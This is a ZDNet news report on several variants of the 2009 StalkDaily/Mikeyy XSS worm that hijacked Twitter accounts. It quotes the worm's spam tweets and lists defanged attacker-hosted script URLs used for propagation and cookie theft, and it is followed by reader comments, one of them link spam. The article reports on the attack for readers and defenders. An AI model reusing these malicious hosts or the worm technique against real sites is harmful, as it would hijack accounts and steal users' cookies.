Twitter hit by multiple variants of XSS worm

Twitter hit by multiple variants of XSS worm

Summary: During the weekend and early Monday, at least four separate variants of the original StalkDaily.com XSS worm hit the popular micro-blogging site Twitter,  automatically hijacking accounts and advertising the author's web site by posting tweets on behalf of the account holders, by exploiting cross site scripting flaws at the site.

SHARE:

During the weekend and early Monday, at least four separate variants of the original StalkDaily.com XSS worm hit the popular micro-blogging site Twitter,  automatically hijacking accounts and advertising the author's web site by posting tweets on behalf of the account holders, by exploiting cross site scripting flaws at the site.

17 years old author of the worm Mikey Mooney claimed responsibility for the worm (photo of him is available, podcast interview as well) citing boredom, and insisting that the most recent variant launched on Monday aimed to prove that Twitter did not fix the cross site scripting flaw which they claim was already taken care of earlier during the day.

Let's analyze all of Mikey's campaigns.

With the proof of concept code for both of the worms now publicly available, and with NoScript's creator Giorgio Maone logical conclusion that Twitter may have in fact not taken care of the XSS flaw as the second variant launched by a third-party was a basically obfuscated version of the first one, Mikey's claims may in fact be true.

The original StalkDaily.com/Mikeyy XSS worm campaign was using automatically Tweeting the following messages:

"Dude, www.StalkDaily.com is awesome. What's the fuss?" "Join www.StalkDaily.com everyone!" "Woooo, www.StalkDaily.com :)" "Virus!? What? www.StalkDaily.com is legit!" "Wow...www.StalkDaily.com" "@twitter www.StalkDaily.com"

Mikey's first release would then attempt to steal cookies and continue spreading by accessing the following URLs - mikeyylolz.uuuq .com/x.js and mikeyylolz.uuuq .com/x.php which he has already removed.

The second Mikeyy XSS worm launched on Sunday is a bit more interesting as it appears that this is a copycat worm which used to take advantage of the following messages:

"Wow...Mikeyy." "Man, Twitter can't fix shit. Mikeyy owns. :)" "Dude! Mikeyy! Seriously? Haha. ;)" "Dude, Mikeyy is the shit! :)" "damn mikeyy. haha." "Twitter should really fix this..." "Mikeyy I am done..." "Mikeyy is done.." "Twitter please fix this, regards Mikeyy"

The second variant -- including a modified version of it -- would then attempt to further propagate by directing the affected users to the following URLs - content.ireel .com/jsxss.js; content.ireel .com/xssjs.js; omghax.uuuq .com/x.php; omghax.uuuq .com/woo.php; bambamyo.110mb .com/wompwomp.js. What we've also got here is an indication of a compromise at iReel.com.

The most recent variant of the worm was launched yesterday, and was apparently relying on the exploitation of an input validation flaw in what Mikeyy claims to be a second vulnerability that he exploited at Twitter.

The campaign was using the following messages to propagate:

"Twitter, freaking fix this already. >:[ - Mikeyy" "Twitter, your community is going to be mad at you... - Mikeyy" "This worm is getting out of hand Twitter. - Mikeyy" "RT!! 4th gen #Mikeyy worm on the loose! Click here to protect yourself: http://tinyurl.com/cojc6s" "This is all Twitters fault! Don't blame Mikeyy!!" "ALERT!! 4TH GEN MIKEYY WORM, USE NOSCRIPT: http://bit.ly/4ywBID" "How TO remove new Mikeyy worm! RT!! http://bit.ly/yCL1s"

Deobfuscated the scripts directs to twitter .com/reberbrerber and to stalkdaily .com/ajax.js. Interestingly, based on the public stats from bit.ly, we can easily evaluate the click-through rate of the latest campaign, with 20,140 clicks so far, with 9,268 from the U.S followed by 3,039 from the U.K for the first URL, and 8,961 clicks, with 4,095 from the U.S, followed by 1,452 from the U.K. for the second one.

With or without the malicious intend of spreading malware, Mikey's persistent actions aiming to prove Twitter's inability to fix the cross site scripting flaws are illegal, and so is the potential compromise of iReel.com for hosting purposes of the javascript code. And whereas these campaigns did not introduce malware or tried to monetize the traffic by for instance installing scareware, different people have different motivations, so instead of waiting for the hardcore cybercriminals to take advantage of such flaws, Twitter should really start treating (trivial) cross site scripting flaws more proactively.

Topics: Security, Social Enterprise

Dancho Danchev

About Dancho Danchev

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response.

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

15 comments
Log in or register to join the discussion
  • You're behind the times...

    This has already hit the /. community two days ago and most of the talk has been the usual "tar & feather" kind for the 17 year old that had created this particular worm. Especially given that at least one of these variants was completely egocentrically benign.

    Frankly, I think more of this sort of thing should be done ethically mind you -- warning of the exploit rather than simply injecting it and letting havoc run loose. Particularly given that I've watched elsewhere when this has been done and the web designer completely [b]ignores[/b] that they have a hole in their code..
    michael.baldelli1
  • Rewards for the guilty

    So Net News Daily publishes an interview with the worm creator who wrote the damn thing to get attention. Then bloggers parrot the purps name in blog posts. I'd say that's MISSION ACCOMPLISHED. Duh.

    There is a reason the NFL no longer allows TV networks to broadcast streakers running across the ball field.
    Telexer
  • RE: Twitter hit by multiple variants of XSS worm

    Let me get this straight , this idiot caused all this trouble because he was bored.

    someone in law enforcement needs to show this idiot what a mess he has caused and then make him fix it and then appologise to all he infected with his idiotic stunt.

    all something like this does is scare the crap out of everyone else

    It makes me so mad that idiots like this one think it's fun to cause so much havoc and why cause he was bored "give me a break"

    there needs to be a precedent set and his ass should be thrown in gaol regardless if he is 17 or not,
    He knew what he was doing , now he should take responsibility for his actions
    davidreddin
    • Community Service?

      A few weeks of sweeping the streets, and picking up litter should relieve the boredome. The trouble with jail, is that they are 'Universities of Crime' and jails don't need another 'Professor of Cyber-Crime!'
      Brother Martin de Porres
  • RE: Twitter hit by multiple variants of XSS worm

    gaol, so classically spelled, is a hole in the ground. perhaps removing boredom by picking up trash until the economic damage has been repaid with 15% or so interest.
    "my scewing with u is actually my doing u a favour" is an ultimate punk pose.
    which perhaps he needs to lose, or else get punked out.
    gabrielbear
    • "Pooper-Scooper-Patrol"

      You took the words out of my mouth, I concur! How about clearing the streets of real shit? He might not like the media attention while he works? and it would send a message to other would-be 'fixers'.
      Brother Martin de Porres
  • Worms....

    abandon the desktop because of worms! Jump into the wormy cloud....


    at least on the desktop I can control whether I am safe or not.
    JoeMama_z
  • RE: Twitter hit by multiple variants of XSS worm

    Jail time, lots and lots of boring, boring jail time.
    kzot
    • Jail time...

      Remember, this person who created this worm was very bored so putting him in a bored jail may not be the best thing.
      phatkat
  • RE: Twitter hit by multiple variants of XSS worm

    Betcha he gets bored in jail in ways he never thought of getting bored.
    inkwell
  • The world's....

    cyber-infrastructure will be collapsed by some 'bored' 17-year-old.

    I only wish it were a joke.
    fewiii
  • RE: Twitter hit by multiple variants of XSS worm

    If you hire and celebrate every criminal the net result will probably not be very positive over the long term. That's a fairly safe assumption. Instead of promoting in my opinion illegal/destructive behavior we should be focusing on those providing solutions, like www.justaskgemalto.com the digital security site.
    Steve KTG
  • Just one more reason NOT to use this dumb site. (nt)

    ...
    IT_Guy_z
  • RE: Twitter hit by multiple variants of XSS worm

    Oooooh let's all twitter about it!
    GPP
  • RE: Twitter hit by multiple variants of XSS worm

    Great!!! thanks for sharing this information to us!
    <a href="http://www.yuregininsesi.com">seslisohbet</a> <a href="http://www.yuregininsesi.com">seslichat</a>
    birumut